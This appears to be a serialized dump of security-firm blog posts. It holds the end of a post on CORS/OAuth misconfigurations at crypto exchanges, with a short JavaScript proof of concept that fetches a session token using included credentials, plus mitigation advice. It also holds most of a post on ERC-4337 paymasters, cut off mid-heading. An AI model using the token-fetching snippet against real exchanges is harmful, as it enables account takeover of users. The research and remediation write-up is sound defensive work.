misconfiguration:",{"type":27,"tag":101,"props":109040,"children":109042},{"className":201,"code":109041,"language":200,"meta":7,"style":7},"(async () => {\n let res = await fetch('https://www.exchange.com/api/session_token', {\n credentials: 'include',\n method: 'POST',\n });\n console.log(await res.json());\n})();\n",[109043],{"type":27,"tag":84,"props":109044,"children":109045},{"__ignoreMap":7},[109046,109069,109106,109123,109140,109147,109186],{"type":27,"tag":207,"props":109047,"children":109048},{"class":209,"line":210},[109049,109053,109057,109061,109065],{"type":27,"tag":207,"props":109050,"children":109051},{"style":238},[109052],{"type":33,"value":1343},{"type":27,"tag":207,"props":109054,"children":109055},{"style":214},[109056],{"type":33,"value":2311},{"type":27,"tag":207,"props":109058,"children":109059},{"style":238},[109060],{"type":33,"value":2316},{"type":27,"tag":207,"props":109062,"children":109063},{"style":214},[109064],{"type":33,"value":2321},{"type":27,"tag":207,"props":109066,"children":109067},{"style":238},[109068],{"type":33,"value":384},{"type":27,"tag":207,"props":109070,"children":109071},{"class":209,"line":244},[109072,109076,109081,109085,109089,109093,109097,109102],{"type":27,"tag":207,"props":109073,"children":109074},{"style":214},[109075],{"type":33,"value":425},{"type":27,"tag":207,"props":109077,"children":109078},{"style":220},[109079],{"type":33,"value":109080}," res",{"type":27,"tag":207,"props":109082,"children":109083},{"style":226},[109084],{"type":33,"value":229},{"type":27,"tag":207,"props":109086,"children":109087},{"style":376},[109088],{"type":33,"value":43461},{"type":27,"tag":207,"props":109090,"children":109091},{"style":1335},[109092],{"type":33,"value":40186},{"type":27,"tag":207,"props":109094,"children":109095},{"style":238},[109096],{"type":33,"value":1343},{"type":27,"tag":207,"props":109098,"children":109099},{"style":1325},[109100],{"type":33,"value":109101},"'https://www.exchange.com/api/session_token'",{"type":27,"tag":207,"props":109103,"children":109104},{"style":238},[109105],{"type":33,"value":56120},{"type":27,"tag":207,"props":109107,"children":109108},{"class":209,"line":270},[109109,109114,109119],{"type":27,"tag":207,"props":109110,"children":109111},{"style":220},[109112],{"type":33,"value":109113}," credentials:",{"type":27,"tag":207,"props":109115,"children":109116},{"style":1325},[109117],{"type":33,"value":109118}," 'include'",{"type":27,"tag":207,"props":109120,"children":109121},{"style":238},[109122],{"type":33,"value":1842},{"type":27,"tag":207,"props":109124,"children":109125},{"class":209,"line":296},[109126,109131,109136],{"type":27,"tag":207,"props":109127,"children":109128},{"style":220},[109129],{"type":33,"value":109130}," method:",{"type":27,"tag":207,"props":109132,"children":109133},{"style":1325},[109134],{"type":33,"value":109135}," 'POST'",{"type":27,"tag":207,"props":109137,"children":109138},{"style":238},[109139],{"type":33,"value":1842},{"type":27,"tag":207,"props":109141,"children":109142},{"class":209,"line":445},[109143],{"type":27,"tag":207,"props":109144,"children":109145},{"style":238},[109146],{"type":33,"value":105409},{"type":27,"tag":207,"props":109148,"children":109149},{"class":209,"line":867},[109150,109154,109158,109162,109166,109170,109174,109178,109182],{"type":27,"tag":207,"props":109151,"children":109152},{"style":220},[109153],{"type":33,"value":1432},{"type":27,"tag":207,"props":109155,"children":109156},{"style":238},[109157],{"type":33,"value":1041},{"type":27,"tag":207,"props":109159,"children":109160},{"style":1335},[109161],{"type":33,"value":1441},{"type":27,"tag":207,"props":109163,"children":109164},{"style":238},[109165],{"type":33,"value":1343},{"type":27,"tag":207,"props":109167,"children":109168},{"style":376},[109169],{"type":33,"value":4173},{"type":27,"tag":207,"props":109171,"children":109172},{"style":220},[109173],{"type":33,"value":109080},{"type":27,"tag":207,"props":109175,"children":109176},{"style":238},[109177],{"type":33,"value":1041},{"type":27,"tag":207,"props":109179,"children":109180},{"style":1335},[109181],{"type":33,"value":41253},{"type":27,"tag":207,"props":109183,"children":109184},{"style":238},[109185],{"type":33,"value":22700},{"type":27,"tag":207,"props":109187,"children":109188},{"class":209,"line":892},[109189],{"type":27,"tag":207,"props":109190,"children":109191},{"style":238},[109192],{"type":33,"value":4310},{"type":27,"tag":36,"props":109194,"children":109195},{},[109196],{"type":33,"value":109197},"During our research, the misconfiguration we found was in an API with an endpoint to return the session token, so the impact was an account takeover (ATO) with some limitations since exchanges usually have MFA to perform some actions like withdrawing.",{"type":27,"tag":58,"props":109199,"children":109200},{"id":47578},[109201],{"type":33,"value":47581},{"type":27,"tag":36,"props":109203,"children":109204},{},[109205,109207,109212],{"type":33,"value":109206},"As mitigation, it is recommended to remove all ",{"type":27,"tag":84,"props":109208,"children":109210},{"className":109209},[],[109211],{"type":33,"value":108887},{"type":33,"value":109213}," URLs from the CORS configuration, including localhost, since a local web server in a mobile environment can abuse it.",{"type":27,"tag":36,"props":109215,"children":109216},{},[109217],{"type":33,"value":109218},"Also, as additional/alternative remediation, it is possible to configure the HSTS policy to include all subdomains and prevent insecure subdomains from loading in the browser.",{"type":27,"tag":28,"props":109220,"children":109221},{"id":10112},[109222],{"type":33,"value":10115},{"type":27,"tag":36,"props":109224,"children":109225},{},[109226],{"type":33,"value":109227},"In conclusion, our deep dive into authentication and client-side bugs within exchange platforms revealed several vulnerabilities stemming from misconfigurations. These types of attacks show the complexity of securing client-side applications due to the different contexts and environments they can operate in.",{"type":27,"tag":36,"props":109229,"children":109230},{},[109231],{"type":33,"value":109232},"It also demonstrates how development configurations can harm the application's security if they are also used in production. Thus, auditors must always understand in which environments and contexts the application will/can be run in, and ensure that the configurations are not insecure for use in production.",{"type":27,"tag":10127,"props":109234,"children":109235},{},[109236],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":109238},[109239,109244,109249],{"id":106931,"depth":244,"text":106934,"children":109240},[109241,109242,109243],{"id":106942,"depth":270,"text":106945},{"id":107299,"depth":270,"text":107302},{"id":108857,"depth":270,"text":108860},{"id":108868,"depth":244,"text":108871,"children":109245},[109246,109247,109248],{"id":108932,"depth":270,"text":108935},{"id":108989,"depth":270,"text":107326},{"id":47578,"depth":270,"text":47581},{"id":10112,"depth":244,"text":10115},"content:blog:2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations.md","blog/2025-10-16-how-we-broke-exchanges-oauth-misconfigurations",{"_path":109254,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":109255,"description":109256,"date":109257,"author":109258,"image":109259,"isFeatured":19,"onBlogPage":19,"tags":109261,"body":109264,"_type":10152,"_id":115033,"_source":10154,"_file":115034,"_stem":115035,"_extension":10157},"/blog/2025-12-02-paymasters-evm","ERC-4337 Paymasters: Better UX, Hidden Risks","ERC-4337 paymasters unlock powerful UX by abstracting gas costs, but they also add complexity and subtle bugs. Explore some common pitfalls in real-world implementations and learn how to design production-ready paymasters.","2025-12-02T12:00:00.000Z","nicholas",{"src":109260,"width":17,"height":18},"/posts/paymasters-evm/title.png",[109262,109263],"evm","ERC-4337",{"type":24,"children":109265,"toc":115012},[109266,109270,109281,109286,109291,109296,109302,109308,109313,109318,109324,109329,109357,109363,109368,109375,109380,109390,109395,109421,109427,109447,109453,109473,109481,109512,109545,109554,109566,109591,109603,109616,109659,109665,109698,109797,109816,109839,109844,109850,109878,110025,110030,110057,110063,110075,110087,110096,110131,110136,111619,111647,111668,111673,111685,111694,111699,111717,111740,111745,111751,111805,111811,111844,111879,112703,112739,112775,112841,112874,113372,113425,113437,114000,114069,114096,114718,114760,114787,114799,114860,114879,114913,114918,114923,114928,114932,114937,114972,114998,115003,115008],{"type":27,"tag":42626,"props":109267,"children":109268},{"id":30},[109269],{"type":33,"value":34},{"type":27,"tag":36,"props":109271,"children":109272},{},[109273,109279],{"type":27,"tag":47,"props":109274,"children":109277},{"href":109275,"rel":109276},"https://docs.erc4337.io/",[51],[109278],{"type":33,"value":109263},{"type":33,"value":109280}," (Account Abstraction) has unlocked a new wave of UX improvements for Ethereum. By decoupling users from EOAs (Externally Owned Accounts), it enables smart contract wallets, gas sponsorships, and flexible authentication mechanisms.",{"type":27,"tag":36,"props":109282,"children":109283},{},[109284],{"type":33,"value":109285},"One of the most powerful features introduced by ERC-4337 is the paymaster, a contract that can sponsor gas fees for users. This allows dApps to deliver seamless, “gasless” experiences where users don’t have to hold ETH to transact.",{"type":27,"tag":36,"props":109287,"children":109288},{},[109289],{"type":33,"value":109290},"However, building a correct paymaster isn’t trivial. We’ve seen many developers trip up on subtle details of the standard, which can cause unexpected behavior or unnecessary complexity.",{"type":27,"tag":36,"props":109292,"children":109293},{},[109294],{"type":33,"value":109295},"In this article, we’ll break down how ERC-4337 works at a high level, zoom in on the paymaster’s role, and walk through the most common pitfalls we’ve observed when implementing paymasters. By the end, you’ll have a clear picture of how to design paymasters that follow best practices and are production-ready.",{"type":27,"tag":42626,"props":109297,"children":109299},{"id":109298},"erc4337-overview",[109300],{"type":33,"value":109301},"ERC4337 Overview",{"type":27,"tag":28,"props":109303,"children":109305},{"id":109304},"traditional-eoas-vs-smart-contract-wallets",[109306],{"type":33,"value":109307},"Traditional EOAs vs Smart Contract Wallets",{"type":27,"tag":36,"props":109309,"children":109310},{},[109311],{"type":33,"value":109312},"In Ethereum’s early design, user accounts are Externally Owned Accounts (EOAs), controlled by a private key. When you send a transaction (e.g. token transfer or contract call), your private key signs the transaction, and you must pay gas in ETH. If the key is lost or stolen, you lose access to everything permanently. This setup is simple, but also rigid and risky.",{"type":27,"tag":36,"props":109314,"children":109315},{},[109316],{"type":33,"value":109317},"By contrast, smart contract accounts (or \"smart wallets\") are programmable. They can enforce logic like multiple signatures, spending limits, social recovery, batching, and more, automating many aspects of security and usability.",{"type":27,"tag":28,"props":109319,"children":109321},{"id":109320},"why-erc4337-was-introduced",[109322],{"type":33,"value":109323},"Why ERC‑4337 Was Introduced",{"type":27,"tag":36,"props":109325,"children":109326},{},[109327],{"type":33,"value":109328},"Smart wallets offer powerful features, but Ethereum’s protocol restricts transactions to originate only from EOAs. Previous proposals (e.g. EIP‑2938, EIP‑3074) tried to change the protocol itself, requiring a hard fork. ERC‑4337 achieves account abstraction entirely off‑chain, using higher-layer infrastructure without any changes to Ethereum’s consensus layer. This unlocks key UX improvements:",{"type":27,"tag":1228,"props":109330,"children":109331},{},[109332,109337,109342,109347,109352],{"type":27,"tag":1232,"props":109333,"children":109334},{},[109335],{"type":33,"value":109336},"User recovery for lost keys (e.g. social recovery)",{"type":27,"tag":1232,"props":109338,"children":109339},{},[109340],{"type":33,"value":109341},"Batched or atomic multi-step operations in one flow",{"type":27,"tag":1232,"props":109343,"children":109344},{},[109345],{"type":33,"value":109346},"Paying gas fees with ERC‑20 tokens or via sponsor (gasless UX)",{"type":27,"tag":1232,"props":109348,"children":109349},{},[109350],{"type":33,"value":109351},"Using custom signature schemes or multisig logic",{"type":27,"tag":1232,"props":109353,"children":109354},{},[109355],{"type":33,"value":109356},"Creation and use of smart contract wallets without needing ETH or seed phrase upfront",{"type":27,"tag":28,"props":109358,"children":109360},{"id":109359},"how-erc-4337-works",[109361],{"type":33,"value":109362},"How ERC-4337 Works",{"type":27,"tag":36,"props":109364,"children":109365},{},[109366],{"type":33,"value":109367},"Before diving into each component, let's look at how ERC-4337 works at a high level:",{"type":27,"tag":36,"props":109369,"children":109370},{},[109371],{"type":27,"tag":126,"props":109372,"children":109374},{"alt":57817,"src":109373},"/posts/paymasters-evm/flowchart.png",[],{"type":27,"tag":36,"props":109376,"children":109377},{},[109378],{"type":33,"value":109379},"The diagram above shows the key flow of ERC-4337. Below is a short explanation of each component shown above.",{"type":27,"tag":58,"props":109381,"children":109383},{"id":109382},"useroperation",[109384],{"type":27,"tag":84,"props":109385,"children":109387},{"className":109386},[],[109388],{"type":33,"value":109389},"UserOperation",{"type":27,"tag":36,"props":109391,"children":109392},{},[109393],{"type":33,"value":109394},"A UserOperation is a pseudo‑transaction object representing the user’s intent. It includes data like:",{"type":27,"tag":1228,"props":109396,"children":109397},{},[109398,109403,109408],{"type":27,"tag":1232,"props":109399,"children":109400},{},[109401],{"type":33,"value":109402},"Target contract call(s)",{"type":27,"tag":1232,"props":109404,"children":109405},{},[109406],{"type":33,"value":109407},"Signature or validation metadata",{"type":27,"tag":1232,"props":109409,"children":109410},{},[109411,109413,109419],{"type":33,"value":109412},"Gas limits and fee payment details (wallet address, paymaster, bundler)\n",{"type":27,"tag":84,"props":109414,"children":109416},{"className":109415},[],[109417],{"type":33,"value":109418},"UserOperations",{"type":33,"value":109420}," are submitted to a separate mempool (often called alt‑mempool), not the regular Ethereum transaction pool.",{"type":27,"tag":58,"props":109422,"children":109424},{"id":109423},"smart-contract-account",[109425],{"type":33,"value":109426},"Smart Contract Account",{"type":27,"tag":36,"props":109428,"children":109429},{},[109430,109432,109438,109439,109445],{"type":33,"value":109431},"Often called Sender or Smart Account, this is a user-controlled contract implementing logic via ",{"type":27,"tag":84,"props":109433,"children":109435},{"className":109434},[],[109436],{"type":33,"value":109437},"validateUserOp()",{"type":33,"value":1131},{"type":27,"tag":84,"props":109440,"children":109442},{"className":109441},[],[109443],{"type":33,"value":109444},"executeUserOp()",{"type":33,"value":109446},". It specifies custom rules: signature checking, nonce logic, allowed calls, or spending limits.",{"type":27,"tag":58,"props":109448,"children":109450},{"id":109449},"bundler",[109451],{"type":33,"value":109452},"Bundler",{"type":27,"tag":36,"props":109454,"children":109455},{},[109456,109458,109463,109465,109471],{"type":33,"value":109457},"A Bundler is an off‑chain service or node monitoring the alt‑mempool. It collects multiple ",{"type":27,"tag":84,"props":109459,"children":109461},{"className":109460},[],[109462],{"type":33,"value":109418},{"type":33,"value":109464},", packages them, and submits them in a single transaction to the ",{"type":27,"tag":84,"props":109466,"children":109468},{"className":109467},[],[109469],{"type":33,"value":109470},"EntryPoint",{"type":33,"value":109472}," contract. Bundlers must use an EOA to pay gas upfront and are later reimbursed.",{"type":27,"tag":58,"props":109474,"children":109475},{"id":21999},[109476],{"type":27,"tag":84,"props":109477,"children":109479},{"className":109478},[],[109480],{"type":33,"value":109470},{"type":27,"tag":36,"props":109482,"children":109483},{},[109484,109485,109490,109492,109497,109499,109503,109505,109510],{"type":33,"value":23888},{"type":27,"tag":84,"props":109486,"children":109488},{"className":109487},[],[109489],{"type":33,"value":109470},{"type":33,"value":109491}," contract acts as the central on-chain gateway for ERC-4337. For every batch of ",{"type":27,"tag":84,"props":109493,"children":109495},{"className":109494},[],[109496],{"type":33,"value":109418},{"type":33,"value":109498}," submitted by a ",{"type":27,"tag":12606,"props":109500,"children":109501},{},[109502],{"type":33,"value":109452},{"type":33,"value":109504},", the ",{"type":27,"tag":84,"props":109506,"children":109508},{"className":109507},[],[109509],{"type":33,"value":109470},{"type":33,"value":109511}," validates and routes each operation back to the corresponding Smart Contract Wallet for execution.",{"type":27,"tag":36,"props":109513,"children":109514},{},[109515,109517,109522,109524,109528,109530,109535,109537,109543],{"type":33,"value":109516},"Once all operations have been processed, the ",{"type":27,"tag":84,"props":109518,"children":109520},{"className":109519},[],[109521],{"type":33,"value":109470},{"type":33,"value":109523}," calculates the total gas consumed and reimburses the ",{"type":27,"tag":12606,"props":109525,"children":109526},{},[109527],{"type":33,"value":109452},{"type":33,"value":109529},". This payment can come either directly from the sender's Smart Account deposit in the ",{"type":27,"tag":84,"props":109531,"children":109533},{"className":109532},[],[109534],{"type":33,"value":109470},{"type":33,"value":109536}," or from a ",{"type":27,"tag":84,"props":109538,"children":109540},{"className":109539},[],[109541],{"type":33,"value":109542},"paymaster",{"type":33,"value":109544}," that has agreed to sponsor the transaction.",{"type":27,"tag":58,"props":109546,"children":109547},{"id":109542},[109548],{"type":27,"tag":84,"props":109549,"children":109551},{"className":109550},[],[109552],{"type":33,"value":109553},"Paymaster",{"type":27,"tag":36,"props":109555,"children":109556},{},[109557,109559,109564],{"type":33,"value":109558},"A ",{"type":27,"tag":84,"props":109560,"children":109562},{"className":109561},[],[109563],{"type":33,"value":109542},{"type":33,"value":109565}," is an optional smart contract that enables flexible gas payment options. It can either sponsor gas fees directly or allow users to pay gas using ERC-20 tokens instead of ETH. It runs two key functions:",{"type":27,"tag":1228,"props":109567,"children":109568},{},[109569,109580],{"type":27,"tag":1232,"props":109570,"children":109571},{},[109572,109578],{"type":27,"tag":84,"props":109573,"children":109575},{"className":109574},[],[109576],{"type":33,"value":109577},"validatePaymasterUserOp()",{"type":33,"value":109579}," to validate the operation. This can check sponsorship eligibility or verify that the user has sufficient ERC-20 token balance and allowance to cover gas costs. The exact implementation of the function depends on how the protocol implements it.",{"type":27,"tag":1232,"props":109581,"children":109582},{},[109583,109589],{"type":27,"tag":84,"props":109584,"children":109586},{"className":109585},[],[109587],{"type":33,"value":109588},"postOp()",{"type":33,"value":109590},", which handles post-execution accounting. For sponsored transactions, this may update internal accounting records, while for token payments, it typically finalizes any accounting related to the ERC-20 token payment.",{"type":27,"tag":36,"props":109592,"children":109593},{},[109594,109596,109601],{"type":33,"value":109595},"By supporting both sponsorship and token-based gas payments, ",{"type":27,"tag":84,"props":109597,"children":109599},{"className":109598},[],[109600],{"type":33,"value":109542},{"type":33,"value":109602}," removes the requirement for users to hold ETH, enabling truly gasless transactions through either model.",{"type":27,"tag":28,"props":109604,"children":109606},{"id":109605},"understanding-the-entrypoints-flow",[109607,109609,109614],{"type":33,"value":109608},"Understanding the ",{"type":27,"tag":84,"props":109610,"children":109612},{"className":109611},[],[109613],{"type":33,"value":109470},{"type":33,"value":109615},"'s Flow",{"type":27,"tag":36,"props":109617,"children":109618},{},[109619,109621,109626,109627,109632,109634,109645,109647,109652,109653,109658],{"type":33,"value":109620},"When a bundler submits ",{"type":27,"tag":84,"props":109622,"children":109624},{"className":109623},[],[109625],{"type":33,"value":109418},{"type":33,"value":23687},{"type":27,"tag":84,"props":109628,"children":109630},{"className":109629},[],[109631],{"type":33,"value":109470},{"type":33,"value":109633}," contract via ",{"type":27,"tag":47,"props":109635,"children":109638},{"href":109636,"rel":109637},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L58",[51],[109639],{"type":27,"tag":84,"props":109640,"children":109642},{"className":109641},[],[109643],{"type":33,"value":109644},"handleOps()",{"type":33,"value":109646},", the processing occurs in two main phases: ",{"type":27,"tag":12606,"props":109648,"children":109649},{},[109650],{"type":33,"value":109651},"Validation",{"type":33,"value":1131},{"type":27,"tag":12606,"props":109654,"children":109655},{},[109656],{"type":33,"value":109657},"Execution",{"type":33,"value":1041},{"type":27,"tag":58,"props":109660,"children":109662},{"id":109661},"validation-phase",[109663],{"type":33,"value":109664},"Validation Phase",{"type":27,"tag":36,"props":109666,"children":109667},{},[109668,109670,109675,109677,109683,109685,109691,109692,109697],{"type":33,"value":109669},"In this phase, the ",{"type":27,"tag":84,"props":109671,"children":109673},{"className":109672},[],[109674],{"type":33,"value":109470},{"type":33,"value":109676}," first validates all operations in the submitted ",{"type":27,"tag":84,"props":109678,"children":109680},{"className":109679},[],[109681],{"type":33,"value":109682},"UserOps",{"type":33,"value":109684}," array before executing any of them. This ensures that only valid operations proceed to execution. For each ",{"type":27,"tag":84,"props":109686,"children":109688},{"className":109687},[],[109689],{"type":33,"value":109690},"UserOp",{"type":33,"value":109504},{"type":27,"tag":84,"props":109693,"children":109695},{"className":109694},[],[109696],{"type":33,"value":109470},{"type":33,"value":736},{"type":27,"tag":12719,"props":109699,"children":109700},{},[109701,109719,109737,109758,109770],{"type":27,"tag":1232,"props":109702,"children":109703},{},[109704,109711,109713],{"type":27,"tag":47,"props":109705,"children":109708},{"href":109706,"rel":109707},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L764-L777",[51],[109709],{"type":33,"value":109710},"Calculates",{"type":33,"value":109712}," the required prefund amount by summing up all specified gas limits (verification, execution, and paymaster if used) multiplied by the user's specified ",{"type":27,"tag":84,"props":109714,"children":109716},{"className":109715},[],[109717],{"type":33,"value":109718},"maxFeePerGas",{"type":27,"tag":1232,"props":109720,"children":109721},{},[109722,109729,109730,109735],{"type":27,"tag":47,"props":109723,"children":109726},{"href":109724,"rel":109725},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L545-L553",[51],[109727],{"type":33,"value":109728},"Calls",{"type":33,"value":13740},{"type":27,"tag":84,"props":109731,"children":109733},{"className":109732},[],[109734],{"type":33,"value":109437},{"type":33,"value":109736}," on the sender's smart account contract to verify the operation's validity (e.g. checking signatures)",{"type":27,"tag":1232,"props":109738,"children":109739},{},[109740,109742,109749,109751,109756],{"type":33,"value":109741},"If no paymaster is specified, attempts to ",{"type":27,"tag":47,"props":109743,"children":109746},{"href":109744,"rel":109745},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L554-L557",[51],[109747],{"type":33,"value":109748},"deduct",{"type":33,"value":109750}," the prefund amount from the sender's ETH deposit in the ",{"type":27,"tag":84,"props":109752,"children":109754},{"className":109753},[],[109755],{"type":33,"value":109470},{"type":33,"value":109757}," (this can be partially refunded later if actual execution costs less)",{"type":27,"tag":1232,"props":109759,"children":109760},{},[109761,109768],{"type":27,"tag":47,"props":109762,"children":109765},{"href":109763,"rel":109764},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L785-L788",[51],[109766],{"type":33,"value":109767},"Validates",{"type":33,"value":109769}," the nonce to prevent replay attacks",{"type":27,"tag":1232,"props":109771,"children":109772},{},[109773,109775,109781,109783,109789,109790,109795],{"type":33,"value":109774},"If a paymaster is specified, it will ",{"type":27,"tag":47,"props":109776,"children":109779},{"href":109777,"rel":109778},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L623-L627",[51],[109780],{"type":33,"value":109748},{"type":33,"value":109782}," the required prefund amount from the paymaster's deposited ETH and then ",{"type":27,"tag":47,"props":109784,"children":109787},{"href":109785,"rel":109786},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L629",[51],[109788],{"type":33,"value":45542},{"type":33,"value":13740},{"type":27,"tag":84,"props":109791,"children":109793},{"className":109792},[],[109794],{"type":33,"value":109577},{"type":33,"value":109796}," on the paymaster contract to verify it will cover gas costs",{"type":27,"tag":36,"props":109798,"children":109799},{},[109800,109802,109807,109809,109814],{"type":33,"value":109801},"Only after all these validation checks pass will the ",{"type":27,"tag":84,"props":109803,"children":109805},{"className":109804},[],[109806],{"type":33,"value":109470},{"type":33,"value":109808}," move on to actually executing the ",{"type":27,"tag":84,"props":109810,"children":109812},{"className":109811},[],[109813],{"type":33,"value":109389},{"type":33,"value":109815},". This strict validation flow ensures that:",{"type":27,"tag":1228,"props":109817,"children":109818},{},[109819,109824,109829,109834],{"type":27,"tag":1232,"props":109820,"children":109821},{},[109822],{"type":33,"value":109823},"The operation is legitimate and authorized by the user",{"type":27,"tag":1232,"props":109825,"children":109826},{},[109827],{"type":33,"value":109828},"Sufficient funds are available to cover gas (either from user or paymaster)",{"type":27,"tag":1232,"props":109830,"children":109831},{},[109832],{"type":33,"value":109833},"The operation cannot be replayed",{"type":27,"tag":1232,"props":109835,"children":109836},{},[109837],{"type":33,"value":109838},"All involved contracts (sender and paymaster) have approved the execution",{"type":27,"tag":36,"props":109840,"children":109841},{},[109842],{"type":33,"value":109843},"This multi-layered validation approach is crucial for maintaining security when processing operations that can involve complex smart account logic and third-party gas sponsorship.",{"type":27,"tag":58,"props":109845,"children":109847},{"id":109846},"execution-phase",[109848],{"type":33,"value":109849},"Execution Phase",{"type":27,"tag":36,"props":109851,"children":109852},{},[109853,109855,109860,109862,109869,109871,109876],{"type":33,"value":109854},"After all operations have passed validation, the ",{"type":27,"tag":84,"props":109856,"children":109858},{"className":109857},[],[109859],{"type":33,"value":109470},{"type":33,"value":109861}," begins the ",{"type":27,"tag":47,"props":109863,"children":109866},{"href":109864,"rel":109865},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L70-L72",[51],[109867],{"type":33,"value":109868},"execution",{"type":33,"value":109870}," phase, processing each ",{"type":27,"tag":84,"props":109872,"children":109874},{"className":109873},[],[109875],{"type":33,"value":109389},{"type":33,"value":109877}," individually. For each operation, the flow is:",{"type":27,"tag":12719,"props":109879,"children":109880},{},[109881,109941,109987],{"type":27,"tag":1232,"props":109882,"children":109883},{},[109884,109885,109890,109892,109898,109899,109905,109907],{"type":33,"value":23888},{"type":27,"tag":84,"props":109886,"children":109888},{"className":109887},[],[109889],{"type":33,"value":109470},{"type":33,"value":109891}," makes a ",{"type":27,"tag":47,"props":109893,"children":109896},{"href":109894,"rel":109895},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L213-L232",[51],[109897],{"type":33,"value":45542},{"type":33,"value":64010},{"type":27,"tag":84,"props":109900,"children":109902},{"className":109901},[],[109903],{"type":33,"value":109904},"innerHandleOp()",{"type":33,"value":109906},", which:\n",{"type":27,"tag":1228,"props":109908,"children":109909},{},[109910,109922,109927],{"type":27,"tag":1232,"props":109911,"children":109912},{},[109913,109920],{"type":27,"tag":47,"props":109914,"children":109917},{"href":109915,"rel":109916},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L403",[51],[109918],{"type":33,"value":109919},"Forwards",{"type":33,"value":109921}," the operation to the sender's smart account contract",{"type":27,"tag":1232,"props":109923,"children":109924},{},[109925],{"type":33,"value":109926},"Executes the intended transaction(s) within the smart account",{"type":27,"tag":1232,"props":109928,"children":109929},{},[109930,109932,109939],{"type":33,"value":109931},"Handles ",{"type":27,"tag":47,"props":109933,"children":109936},{"href":109934,"rel":109935},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L821",[51],[109937],{"type":33,"value":109938},"post-execution",{"type":33,"value":109940}," tasks and cleanup",{"type":27,"tag":1232,"props":109942,"children":109943},{},[109944,109946,109952,109954,109960,109961,109967,109969],{"type":33,"value":109945},"If a paymaster was used, ",{"type":27,"tag":84,"props":109947,"children":109949},{"className":109948},[],[109950],{"type":33,"value":109951},"Entrypoint",{"type":33,"value":109953}," will ",{"type":27,"tag":47,"props":109955,"children":109958},{"href":109956,"rel":109957},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L848-L857",[51],[109959],{"type":33,"value":45542},{"type":33,"value":13740},{"type":27,"tag":84,"props":109962,"children":109964},{"className":109963},[],[109965],{"type":33,"value":109966},"paymaster.postOp()",{"type":33,"value":109968}," to:\n",{"type":27,"tag":1228,"props":109970,"children":109971},{},[109972,109977,109982],{"type":27,"tag":1232,"props":109973,"children":109974},{},[109975],{"type":33,"value":109976},"Allow paymaster to finalize its accounting",{"type":27,"tag":1232,"props":109978,"children":109979},{},[109980],{"type":33,"value":109981},"Process any refunds or additional charges",{"type":27,"tag":1232,"props":109983,"children":109984},{},[109985],{"type":33,"value":109986},"Complete any paymaster-specific logic",{"type":27,"tag":1232,"props":109988,"children":109989},{},[109990,109992,109997,109998,110005,110007],{"type":33,"value":109991},"Finally, after all operations are processed, the ",{"type":27,"tag":84,"props":109993,"children":109995},{"className":109994},[],[109996],{"type":33,"value":109470},{"type":33,"value":13740},{"type":27,"tag":47,"props":109999,"children":110002},{"href":110000,"rel":110001},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L74",[51],[110003],{"type":33,"value":110004},"compensates",{"type":33,"value":110006}," the bundler for:\n",{"type":27,"tag":1228,"props":110008,"children":110009},{},[110010,110015,110020],{"type":27,"tag":1232,"props":110011,"children":110012},{},[110013],{"type":33,"value":110014},"Gas costs from executing all operations",{"type":27,"tag":1232,"props":110016,"children":110017},{},[110018],{"type":33,"value":110019},"Overhead from submitting the batch transaction",{"type":27,"tag":1232,"props":110021,"children":110022},{},[110023],{"type":33,"value":110024},"Any unused gas, which is refunded",{"type":27,"tag":36,"props":110026,"children":110027},{},[110028],{"type":33,"value":110029},"This execution flow ensures secure and atomic operation execution, accurate tracking and settlement of gas costs, support for custom paymaster payment logic, and proper compensation for bundlers who provide the transaction submission service.",{"type":27,"tag":36,"props":110031,"children":110032},{},[110033,110035,110040,110042,110048,110050,110055],{"type":33,"value":110034},"Now that we understand how the ",{"type":27,"tag":84,"props":110036,"children":110038},{"className":110037},[],[110039],{"type":33,"value":109470},{"type":33,"value":110041}," works at a high level, let's examine how some protocols have failed to properly implement ",{"type":27,"tag":84,"props":110043,"children":110045},{"className":110044},[],[110046],{"type":33,"value":110047},"paymasters",{"type":33,"value":110049}," that align with the ",{"type":27,"tag":84,"props":110051,"children":110053},{"className":110052},[],[110054],{"type":33,"value":109470},{"type":33,"value":110056},"'s execution model, leading to potential vulnerabilities.",{"type":27,"tag":42626,"props":110058,"children":110060},{"id":110059},"common-pitfalls-in-paymaster-implementation",[110061],{"type":33,"value":110062},"Common Pitfalls in Paymaster Implementation",{"type":27,"tag":36,"props":110064,"children":110065},{},[110066,110068,110073],{"type":33,"value":110067},"While paymasters offer powerful flexibility, they also introduce new complexity, and with it, room for subtle bugs. Missteps in paymaster design can not only break gas sponsorship flows, but also expose their deposited ETH in the ",{"type":27,"tag":84,"props":110069,"children":110071},{"className":110070},[],[110072],{"type":33,"value":109470},{"type":33,"value":110074}," to exploitation or griefing.",{"type":27,"tag":36,"props":110076,"children":110077},{},[110078,110080,110085],{"type":33,"value":110079},"In this section, we’ll walk through the ",{"type":27,"tag":12606,"props":110081,"children":110082},{},[110083],{"type":33,"value":110084},"two most common pitfalls",{"type":33,"value":110086}," we’ve observed in real-world paymaster implementations:",{"type":27,"tag":28,"props":110088,"children":110090},{"id":110089},"undercalculated-gas-costs",[110091],{"type":27,"tag":12606,"props":110092,"children":110093},{},[110094],{"type":33,"value":110095},"Undercalculated 